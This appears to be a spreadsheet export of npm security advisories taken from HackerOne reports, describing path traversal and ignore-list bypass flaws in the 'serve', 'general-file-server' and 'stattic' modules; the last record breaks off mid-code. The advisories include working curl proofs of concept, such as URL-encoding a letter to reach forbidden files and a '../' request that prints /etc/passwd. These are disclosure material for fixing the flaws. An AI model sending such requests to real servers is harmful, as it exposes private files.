&lt;span class="kr"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;server&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;serve&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;__dirname&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
      &lt;span class="na"&gt;port&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;1337&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
      &lt;span class="na"&gt;ignore&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;testfolder&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;test.txt&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;
&lt;span class="p"&gt;})&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;ul&gt;
&lt;li&gt;Run the app&lt;/li&gt;
&lt;/ul&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="gp"&gt;$ &lt;/span&gt;node filename.js
&lt;/code&gt;&lt;/pre&gt;
&lt;ul&gt;
&lt;li&gt;Now, current directory will be served by &lt;code&gt;serve&lt;/code&gt; with the exception of folder &lt;code&gt;testfolder&lt;/code&gt; and file &lt;code&gt;test.txt&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;If we try to curl &lt;code&gt;test.txt&lt;/code&gt; we get a &lt;code&gt;Not Found&lt;/code&gt; error&lt;/li&gt;
&lt;/ul&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="gp"&gt;$ &lt;/span&gt;curl http://localhost:1337/test.txt
Not Found
&lt;/code&gt;&lt;/pre&gt;
&lt;ul&gt;
&lt;li&gt;The url encoded value for &lt;code&gt;e&lt;/code&gt; is &lt;code&gt;%65&lt;/code&gt;. So after replacing an &lt;code&gt;e&lt;/code&gt; with its url encoded form, we are able to access the file.&lt;/li&gt;
&lt;/ul&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="gp"&gt;$ &lt;/span&gt;curl http://localhost:1337/t%65st.txt
this is a forbidden file :D
&lt;/code&gt;&lt;/pre&gt;
&lt;ul&gt;
&lt;li&gt;Additionally, curling the directory &lt;code&gt;testfolder&lt;/code&gt; returns a 404 too.&lt;/li&gt;
&lt;/ul&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="gp"&gt;$ &lt;/span&gt;curl http://localhost:1337/testfolder/
Not Found
&lt;/code&gt;&lt;/pre&gt;
&lt;ul&gt;
&lt;li&gt;Applying the same strategy as above, we are able to get a listing of all the files and folders inside the restricted directory.&lt;/li&gt;
&lt;/ul&gt;
&lt;pre class="highlight html"&gt;&lt;code&gt;$ curl http://localhost:1337/t%65stfolder/
&lt;span class="cp"&gt;&amp;lt;!DOCTYPE html&amp;gt;&lt;/span&gt;
&lt;span class="nt"&gt;&amp;lt;html&lt;/span&gt; &lt;span class="na"&gt;lang=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;en&amp;quot;&lt;/span&gt;&lt;span class="nt"&gt;&amp;gt;&lt;/span&gt;
  &lt;span class="nt"&gt;&amp;lt;head&amp;gt;&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;lt;meta&lt;/span&gt; &lt;span class="na"&gt;charset=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;utf-8&amp;quot;&lt;/span&gt;&lt;span class="nt"&gt;&amp;gt;&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;lt;meta&lt;/span&gt; &lt;span class="na"&gt;name=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;viewport&amp;quot;&lt;/span&gt; &lt;span class="na"&gt;content=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;width=device-width, initial-scale=1&amp;quot;&lt;/span&gt;&lt;span class="nt"&gt;&amp;gt;&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;lt;title&amp;gt;&lt;/span&gt;Files within testserve/testfolder/&lt;span class="nt"&gt;&amp;lt;/title&amp;gt;&lt;/span&gt;
      .
      .
          &lt;span class="nt"&gt;&amp;lt;li&amp;gt;&lt;/span&gt;
            &lt;span class="nt"&gt;&amp;lt;a&lt;/span&gt; &lt;span class="na"&gt;href=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;/testfolder/testfile.txt&amp;quot;&lt;/span&gt; &lt;span class="na"&gt;title=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;testfile.txt&amp;quot;&lt;/span&gt; &lt;span class="na"&gt;class=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;txt&amp;quot;&lt;/span&gt;&lt;span class="nt"&gt;&amp;gt;&lt;/span&gt;testfile.txt&lt;span class="nt"&gt;&amp;lt;/a&amp;gt;&lt;/span&gt;
            &lt;span class="nt"&gt;&amp;lt;i&amp;gt;&lt;/span&gt;31 B&lt;span class="nt"&gt;&amp;lt;/i&amp;gt;&lt;/span&gt;
          &lt;span class="nt"&gt;&amp;lt;/li&amp;gt;&lt;/span&gt;
      .
      .
&lt;/code&gt;&lt;/pre&gt;
&lt;ul&gt;
&lt;li&gt;And then we can further access the files inside the forbidden folder using same strategy.&lt;/li&gt;
&lt;/ul&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="gp"&gt;$ &lt;/span&gt;curl http://localhost:1337/t%65stfolder/testfile.txt
this is a &lt;span class="nb"&gt;test&lt;/span&gt; ... forbidden !
&lt;/code&gt;&lt;/pre&gt;
&lt;h2 id="mitigation-strategy"&gt;Mitigation Strategy&lt;/h2&gt;
&lt;p&gt;From what I could gather, this is happening because the path variable that is being checked against the user created forbidden folders blacklist, is essentially different from the one which is being used to serve the file/folder. &lt;br&gt;
Note these particular lines in file &lt;code&gt;/lib/server.js&lt;/code&gt;-&lt;/p&gt;
&lt;pre class="highlight javascript"&gt;&lt;code&gt;&lt;span class="mi"&gt;90&lt;/span&gt;  &lt;span class="kr"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;ignored&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="nx"&gt;ignoredFiles&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;every&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;item&lt;/span&gt; &lt;span class="o"&gt;=&amp;gt;&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
&lt;span class="mi"&gt;91&lt;/span&gt;    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="nx"&gt;pathname&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;includes&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;item&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="mi"&gt;92&lt;/span&gt;  &lt;span class="p"&gt;})&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Line &lt;code&gt;91&lt;/code&gt; handles the logic for checking if one of the ignored folder/file names is present in the current requested path. Note that here, the variable &lt;code&gt;pathname&lt;/code&gt; is used. This variable is not url decoded, while the variable which is used to actually serve the file is named &lt;code&gt;related&lt;/code&gt; and is url decoded by passing requested path through &lt;code&gt;decodeURIComponent&lt;/code&gt; function.&lt;br&gt;
So one strategy would be to use the &lt;code&gt;related&lt;/code&gt; variable for checking against the blacklist too.&lt;/p&gt;
&lt;h2 id="impact"&gt;Impact&lt;/h2&gt;
&lt;p&gt;The issue essentially bypasses the &lt;code&gt;ignore files/folders&lt;/code&gt; feature and allows an attacker to read from a directory/file that the victim has not allowed access to.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>2018-01-24T19:02:23.144Z</t>
  </si>
  <si>
    <t>2018-03-13T06:53:14.242Z</t>
  </si>
  <si>
    <t>The issue essentially bypasses the ignore files/folders feature and allows an attacker to read from a directory/file that the victim has not allowed access to.</t>
  </si>
  <si>
    <t xml:space="preserve">Module      Name  serve   Version  latest (6.4.9)  Link  https //www.npmjs.com/package/serve    Description  serve modules allows directory browsing serve static files browser. config option ignore used tell module file directory forbidden not served.  rule bypassed url encoding name file directory forbidden.   Reproduction Steps    Install serve  Create application uses serve file serving listing set few folders files ignore config.  const serve = require("serve") const server = serve(__dirname, {       port  1337,       ignore  ["testfolder", "test.txt"] })   Run app  $ node   Now, current directory will served serve exception folder testfolder file  try curl Not Found error  $ curl http //localhost 1337/test.txt Not Found   url encoded value e %65. So replacing e its url encoded form, able access file.  $ curl http //localhost 1337/t%65st.txt forbidden file  D   Additionally, curling directory testfolder returns 404 too.  $ curl http //localhost 1337/testfolder/ Not Found   Applying strategy above, able listing files folders inside restricted directory.  $ curl http //localhost 1337/t%65stfolder/                    Files within testserve/testfolder/       .       .                                    31 B                  .       .   further access files inside forbidden folder using strategy.  $ curl http //localhost 1337/t%65stfolder/testfile.txt test ... forbidden    Mitigation Strategy  gather, happening path variable checked against user created forbidden folders blacklist, essentially different one used serve file/folder.  Note particular lines file /lib/server.js  90  const ignored =  ignoredFiles.every(item =  { 91    return  pathname.includes(item) 92  })  Line 91 handles logic checking one ignored folder/file names present current requested path. Note here, variable pathname used. variable not url decoded, variable used actually serve file named related url decoded passing requested path decodeURIComponent function. So one strategy use related variable checking against blacklist too.  Impact  issue essentially bypasses ignore files/folders feature allows attacker read directory/file victim not allowed access to. </t>
  </si>
  <si>
    <t>issue essentially bypasses ignore files/folders feature allows attacker read directory/file victim not allowed access to.</t>
  </si>
  <si>
    <t>/advisories/593</t>
  </si>
  <si>
    <t>2018-04-24T22:54:57.432+00:00</t>
  </si>
  <si>
    <t>https-proxy-agent</t>
  </si>
  <si>
    <t>https://www.npmjs.com/https-proxy-agent</t>
  </si>
  <si>
    <t>&lt;=2.1.1</t>
  </si>
  <si>
    <t>&gt;=2.2.0</t>
  </si>
  <si>
    <t>[general-file-server] Path Traversal vulnerability allows to read content on arbitrary file on the server</t>
  </si>
  <si>
    <t>/advisories/592</t>
  </si>
  <si>
    <t>2018-04-24T22:50:27.015+00:00</t>
  </si>
  <si>
    <t>general-file-server</t>
  </si>
  <si>
    <t>https://www.npmjs.com/general-file-server</t>
  </si>
  <si>
    <t>https://hackerone.com/reports/310943.json</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Hi Guys,&lt;/p&gt;
&lt;p&gt;There is Path Traversal in general-file-server module.&lt;br&gt;
It allows to read content of arbitrary files on the remote server.&lt;/p&gt;
&lt;h2 id="module"&gt;Module&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;general-file-server&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;This is a general file server made by nodejs. It will be easy for you to access the files on the server through the browser.&lt;/p&gt;
&lt;p&gt;&lt;a title="https://www.npmjs.com/package/general-file-server" href="/redirect?signature=258609300083a2fede6a9c00a2aa7fb66e258da4&amp;amp;url=https%3A%2F%2Fwww.npmjs.com%2Fpackage%2Fgeneral-file-server" target="_blank" rel="nofollow noopener noreferrer"&gt;&lt;span&gt;https://www.npmjs.com/package/general-file-server&lt;/span&gt;&lt;i class="icon-external-link"&gt;&lt;/i&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;version: 1.1.8&lt;/p&gt;
&lt;p&gt;Stats&lt;br&gt;
1 download in the last day&lt;br&gt;
17 downloads in the last week&lt;br&gt;
67 downloads in the last month&lt;/p&gt;
&lt;p&gt;~750 estimated downloads per year&lt;/p&gt;
&lt;h2 id="description"&gt;Description&lt;/h2&gt;
&lt;p&gt;Lack of file path sanitization causes that any file on the server might be read by malicious user, despite the fact that there is &lt;code&gt;root_path&lt;/code&gt; setting in module&amp;#39;s &lt;code&gt;config.js&lt;/code&gt; file:&lt;/p&gt;
&lt;pre class="highlight javascript"&gt;&lt;code&gt;&lt;span class="c1"&gt;// sample config.js&lt;/span&gt;
&lt;span class="nx"&gt;module&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;exports&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="na"&gt;hostname&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;127.0.0.1&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="na"&gt;port&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;8080&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="na"&gt;root_path&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;./&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="na"&gt;title&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;General File Server&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="na"&gt;logo_link&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;/____statics/logo.png&amp;quot;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Here&amp;#39;s the code which causes issue:&lt;/p&gt;
&lt;pre class="highlight javascript"&gt;&lt;code&gt;&lt;span class="c1"&gt;// node_modules/general-file-server/server.js, line 77&lt;/span&gt;
&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;pathname&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;search&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;____statics&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="nx"&gt;currpath&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;__dirname&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="nx"&gt;pathname&lt;/span&gt;
        &lt;span class="nx"&gt;fs&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;stat&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;currpath&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;function&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;err&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;stat&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;err&lt;/span&gt; &lt;span class="o"&gt;||&lt;/span&gt; &lt;span class="nx"&gt;stat&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;isDirectory&lt;/span&gt;&lt;span class="p"&gt;())&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
                &lt;span class="nx"&gt;endupwith404&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;res&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="k"&gt;else&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
                &lt;span class="nx"&gt;res&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;writeHeader&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;200&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
                    &lt;span class="s1"&gt;&amp;#39;Content-Type&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;mime&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;lookup&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;currpath&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
                &lt;span class="p"&gt;})&lt;/span&gt;
                &lt;span class="nx"&gt;fs&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;createReadStream&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;currpath&lt;/span&gt;&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="nx"&gt;pipe&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;res&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="p"&gt;}&lt;/span&gt;
        &lt;span class="p"&gt;})&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;As you can see, &lt;code&gt;currpath&lt;/code&gt; is passed to &lt;code&gt;fs.createFileStream()&lt;/code&gt; and piped directly into Response object withou any sanitization against Path Traversal.&lt;/p&gt;
&lt;h2 id="steps-to-reproduce"&gt;Steps To Reproduce:&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;install &lt;code&gt;general-file-server&lt;/code&gt;:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;$ npm install general-file-server
&lt;/code&gt;&lt;/pre&gt;
&lt;ul&gt;
&lt;li&gt;run &lt;code&gt;general-file-server&lt;/code&gt; in direcotry of your choice. It will use settings from &lt;code&gt;config.js&lt;/code&gt; file:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;me:~/playground/hackerone/Node$ ./node_modules/general-file-server/server.js
&amp;gt; serving &amp;quot;./&amp;quot; http://127.0.0.1:8080
&lt;/code&gt;&lt;/pre&gt;
&lt;ul&gt;
&lt;li&gt;execute following &lt;code&gt;curl&lt;/code&gt; command (adjust number of ../ to reflect your system):&lt;/li&gt;
&lt;/ul&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;$ curl -v --path-as-is http://127.0.0.1:8080/../../../../../../etc/passwd
&lt;/code&gt;&lt;/pre&gt;
&lt;ul&gt;
&lt;li&gt;see result:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;*   Trying 127.0.0.1...
* Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0)
&amp;gt; GET /../../../../../../etc/passwd HTTP/1.1
&amp;gt; Host: 127.0.0.1:8080
&amp;gt; User-Agent: curl/7.47.0
&amp;gt; Accept: */*
&amp;gt; 
&amp;lt; HTTP/1.1 200 OK
&amp;lt; Content-Type: application/octet-stream
&amp;lt; Date: Wed, 31 Jan 2018 12:53:13 GMT
&amp;lt; Connection: keep-alive
&amp;lt; Transfer-Encoding: chunked
&amp;lt; 
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
(...)
&lt;/code&gt;&lt;/pre&gt;
&lt;h2 id="supporting-material-references"&gt;Supporting Material/References:&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;Ubuntu 16.04 LTS&lt;/li&gt;
&lt;li&gt;Chromium 66.0.3333.0 (Developer Build) (64-bit) &lt;/li&gt;
&lt;li&gt;Node.js version: v8.9.4 LTS&lt;/li&gt;
&lt;li&gt;npm version: 5.6.0&lt;/li&gt;
&lt;li&gt;curl 7.47.0&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Please feel free to invite module maintainer to this report. I haven&amp;#39;t contacted maintainer as I want to keep the process of fixing and disclosing bug consistent through HackerOne platform only.&lt;/p&gt;
&lt;p&gt;I hope my report will help to keep Node.js ecosystem and its users safe in the future.&lt;/p&gt;
&lt;p&gt;Regards,&lt;/p&gt;
&lt;p&gt;Rafal &amp;#39;bl4de&amp;#39; Janicki&lt;/p&gt;
&lt;h2 id="impact"&gt;Impact&lt;/h2&gt;
&lt;p&gt;This vulnerability allows malicious user to read content of any file on the server&lt;/p&gt;
</t>
  </si>
  <si>
    <t>2018-01-31T13:35:55.843Z</t>
  </si>
  <si>
    <t>2018-03-10T14:31:20.387Z</t>
  </si>
  <si>
    <t>This vulnerability allows malicious user to read content of any file on the server</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Guys,  Path Traversal general file server module. allows read content arbitrary files remote server.  Module  general file server  general file server made nodejs. will easy access files server browser.  https //www.npmjs.com/package/general file server  version  1.1.8  Stats 1 download last day 17 downloads last week 67 downloads last month  ~750 estimated downloads per year  Description  Lack file path sanitization causes file server read malicious user, despite fact root_path setting module"s file  // sample = {     hostname  "127.0.0.1",     port  8080,     root_path  Â« Â»./Â« Â»,     title  Â« Â»General File ServerÂ« Â»,     logo_link  Â« Â»/____statics/logo.pngÂ« Â» }  Here"s code causes issue  // node_modules/general file server/server.js, line 77 (pathname.search("____statics") == 1) {         currpath = __dirname + pathname          fs.stat(currpath, function (err, stat) {             (err || stat.isDirectory()) {                 endupwith404(res)             } else {                 res.writeHeader(200, {                     "Content Type"  mime.lookup(currpath)                 })                 fs.createReadStream(currpath).pipe(res)             }         })     }  see, currpath passed fs.createFileStream() piped directly Response object withou sanitization against Path Traversal.  Steps Reproduce    install general file server   $ npm install general file server   run general file server direcotry choice. will use settings file   ~/playground/hackerone/Node$ ./node_modules/general file server/server.js   serving Â« Â»./Â« Â» http //127.0.0.1 8080   execute following curl command (adjust number ../ reflect system)   $ curl  v   path http //127.0.0.1 8080/../../../../../../etc/passwd   result   *   Trying 127.0.0.1... * Connected (127.0.0.1) port 8080 (#0)   /../../../../../../etc/passwd HTTP/1.1   Host  8080   User Agent  curl/7.47.0   Accept  */*    &lt; HTTP/1.1 200 OK &lt; Content Type  application/octet stream &lt; Date  Wed, 31 Jan 2018 12 53 13 GMT &lt; Connection  keep alive &lt; Transfer Encoding  chunked &lt;  root x 0 0 root /root /bin/bash daemon x 1 1 daemon /usr/sbin /usr/sbin/nologin bin x 2 2 bin /bin /usr/sbin/nologin (...)  Supporting Material/References    Ubuntu 16.04 LTS Chromium 66.0.3333.0 (Developer Build) (64 bit)  version  v8.9.4 LTS npm version  5.6.0 curl 7.47.0   Please feel free invite module maintainer report. haven"t contacted maintainer want keep process fixing disclosing bug consistent HackerOne platform only.  hope report will help keep ecosystem its users safe future.  Regards,  Rafal "bl4de" Janicki  Impact  vulnerability allows malicious user read content file server </t>
  </si>
  <si>
    <t>vulnerability allows malicious user read content file server</t>
  </si>
  <si>
    <t>[stattic] Inproper path validation leads to Path Traversal and allows to read arbitrary files with any extension(s)</t>
  </si>
  <si>
    <t>/advisories/591</t>
  </si>
  <si>
    <t>2018-04-24T22:48:20.335+00:00</t>
  </si>
  <si>
    <t>stattic</t>
  </si>
  <si>
    <t>https://www.npmjs.com/stattic</t>
  </si>
  <si>
    <t>&lt;0.3.0</t>
  </si>
  <si>
    <t>&gt;=0.3.0</t>
  </si>
  <si>
    <t>https://hackerone.com/reports/319003.json</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to report Path Traversal in &lt;code&gt;stattic&lt;/code&gt; module.&lt;br&gt;
It allows to read content of some arbitrary files from the server where &lt;code&gt;stattic&lt;/code&gt; is installed and run.&lt;/p&gt;
&lt;h2 id="module"&gt;Module&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;module name:&lt;/strong&gt; stattic&lt;br&gt;
&lt;strong&gt;version:&lt;/strong&gt; 0.2.3&lt;br&gt;
&lt;strong&gt;npm page:&lt;/strong&gt; &lt;a title="https://www.npmjs.com/package/stattic" href="/redirect?signature=fc5c7377f5308d6b357ac345dbef84ceda1f435e&amp;amp;url=https%3A%2F%2Fwww.npmjs.com%2Fpackage%2Fstattic" target="_blank" rel="nofollow noopener noreferrer"&gt;&lt;span&gt;https://www.npmjs.com/package/stattic&lt;/span&gt;&lt;i class="icon-external-link"&gt;&lt;/i&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h3 id="module-description"&gt;Module Description&lt;/h3&gt;
&lt;p&gt;Ridiculous simple script for serving static files using http module.&lt;/p&gt;
&lt;h3 id="module-stats"&gt;Module Stats&lt;/h3&gt;
&lt;p&gt;Stats&lt;br&gt;
7 downloads in the last day&lt;br&gt;
32 downloads in the last week&lt;br&gt;
77 downloads in the last month&lt;/p&gt;
&lt;p&gt;~900 estimated downloads per year&lt;/p&gt;
&lt;h2 id="vulnerability-description"&gt;Vulnerability Description&lt;/h2&gt;
&lt;p&gt;Path Traversal vulnerability in &lt;code&gt;stattic module&lt;/code&gt; allows to go up in directory tree and read content of some files outside of the root path set up in the module config.&lt;/p&gt;
&lt;p&gt;However, this issue allows to read only files with extension, because if no extension is provided, &lt;code&gt;stattic&lt;/code&gt; by default uses setting from &lt;code&gt;options.index&lt;/code&gt; variable.&lt;/p&gt;
&lt;h2 id="steps-to-reproduce"&gt;Steps To Reproduce:&lt;/h2&gt;
&lt;p&gt;Install &lt;code&gt;stattic&lt;/code&gt; module:&lt;/p&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;$ npm install stattic
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Create sample application:&lt;/p&gt;
&lt;pre class="highlight javascript"&gt;&lt;code&gt;&lt;span class="c1"&gt;// app.js&lt;/span&gt;
&lt;span class="c1"&gt;//Import libs&lt;/span&gt;
&lt;span class="kd"&gt;var&lt;/span&gt; &lt;span class="nx"&gt;stattic&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;require&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;stattic&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="c1"&gt;//Set the folder with the static files&lt;/span&gt;
&lt;span class="nx"&gt;stattic&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;set&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;folder&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;./&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="c1"&gt;//Set the port&lt;/span&gt;
&lt;span class="nx"&gt;stattic&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;set&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;port&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;8080&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="c1"&gt;//Run the server&lt;/span&gt;
&lt;span class="nx"&gt;stattic&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;listen&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Run application:&lt;/p&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;$ node app.js
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Here&amp;#39;s the part of &lt;code&gt;stattic&lt;/code&gt; code responsible for handling paths:&lt;/p&gt;
&lt;pre class="highlight javascript"&gt;&lt;code&gt;&lt;span class="c1"&gt;// node_modules/stattic/index.js, line 70:&lt;/span&gt;
    &lt;span class="c1"&gt;//Parse the request url and get only the pathname&lt;/span&gt;
    &lt;span class="kd"&gt;var&lt;/span&gt; &lt;span class="nx"&gt;pathname&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;url&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;parse&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;req&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;url&lt;/span&gt;&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="nx"&gt;pathname&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="c1"&gt;//Resolve to the local folder&lt;/span&gt;
